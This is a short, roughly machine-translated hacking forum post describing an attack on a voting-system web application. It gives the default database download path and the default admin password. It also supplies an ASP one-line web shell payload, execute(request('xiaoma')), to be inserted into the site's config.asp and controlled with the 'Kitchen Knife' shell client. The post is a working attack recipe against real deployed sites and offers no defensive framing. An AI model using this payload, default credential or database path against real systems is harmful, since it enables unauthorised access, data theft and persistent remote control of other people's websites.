Previous: No worries School website system 1.0 vulnerabilities and repair
Actually, it's not even a 0day. It's just a thought. It's boring recently. I ignored A5 and looked at it. I found a voting system. After a rough look, there were a lot of people using it. So I went down and studied it. I set up this machine and checked it, there are basically no vulnerabilities in the Code (maybe my technology is not good), so I switched to the station, found the database, and turned around on the Internet, basically can download the database,
What about using shell in the background,
Insert a sentence in the website configuration area. This common sentence cannot be used. Use a variant sentence, insert, and test.
One sentence:
1 "%> <% execute (request (" xiaoma ") %> <%'
Hey, this is a variant. It's common and cannot be used.
Default Account Password: admin
This killer rate is very high, so we can download the database as soon as possible.
Database address: data/xiao5u. mdb
Insert a sentence. Kitchen Knife connection
Www.2cto.com/inc/config. asp